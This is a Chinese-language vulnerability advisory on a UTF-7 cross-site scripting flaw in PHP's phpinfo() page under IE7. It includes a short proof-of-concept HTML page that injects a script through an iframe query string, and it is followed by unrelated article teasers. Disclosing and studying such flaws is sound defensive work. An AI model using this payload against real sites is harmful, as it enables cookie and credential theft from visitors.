漏洞说明: php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发。phpinfo()是用来显示当前php环境的一个函数,许多站点和程序都会将phpinfo放在自己的站点上或者在程序里显示,但是phpinfo里存在一些安全问题,导致精心构造数据就可以产生一个跨站脚本漏洞,可以被用来进行攻击。
漏洞成因: phpinfo页面对输入的参数都做了详细的过滤,但是没有对输出的进行charset的指定,而在一些浏览器里如IE7里,你可以让它自动选择编码或者通过一个iframe页面给它指定编码,这样就可以饶过phpinfo的过滤而产生一个跨站脚本漏洞。
漏洞来源: http://www.80sec.com/
漏洞利用: 利用代码如下:
<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
<body>
<iframe src="http://www.80sec.com/phpinfo.php?+ADw-SCRIPT+AD4-alert(document.domain);+ADw-/SCRIPT+AD4-=1">
以上代码在IE7+php 5.2.6测试成功。phpinfo页面的xss甚至比其他页面更加危险,因为如果有phpinfo的存在,恶意攻击者可以利用phpinfo的输出bypass如httponly和一些基础认证。
漏洞影响: 影响所有版本的php和浏览器IE7
漏洞修补: 建议暂时删除站点的phpinfo页面避免被人利用。
这篇文章描述了我们对哈萨克斯坦政府实施的电信级HTTPS劫持的分析。 哈萨克斯坦政府最近开始使用一个假的根证书颁发机构,对包括Facebook,Twitter和Google等网站在内的HTTPS连接...
微信普遍使用的情况下,大家肯定想知道如何才能不让别人发现自己的微信定位位置,那么如何才能不被发现微信具体的位置呢,这几种方法可以试一试。 不让别人发现自己微信定位的方法 安卓手机这样试一试: 1...
花狐狸新浪博客讲述股指期货配资如何操作600362股吧,具体流程是什么? 股指期货是也可称为股价指数期货、期指,是指以股价指数为标的物的标准化期货合约,双方约定在未来的某个特定日期,可以按照事先确定...
天津滨海新区公安局有一批特警,他们像医生一样守卫着公安网络的安全,而黑客,为公安网络建立了强大的免疫系统和疾病控制监控,诊断和治疗网络病毒和安全问题。近日,“法制日报”记者深入天津滨海新区公安局科技情...
中国好的黑客培训机构(黑客培训),光阴回到今年年5月的一天,彭骊在四川省眉山市的一栋住户楼里教电脑。黑板上写满了IT术语。屏幕前,房间里回荡着键盘的爆裂声。在他的引导下,来自天下各地的大概10名门生频...
我们在感情当中总会遇到迷途,但是两个人的感情就可以为你们两个人的未来照亮前方的道路,累了的时候就去想一想自己曾经在这段感情里经历的一切,不要总是患得患失想着离开或者害怕离开,害怕自己的伴侣会因为自己的...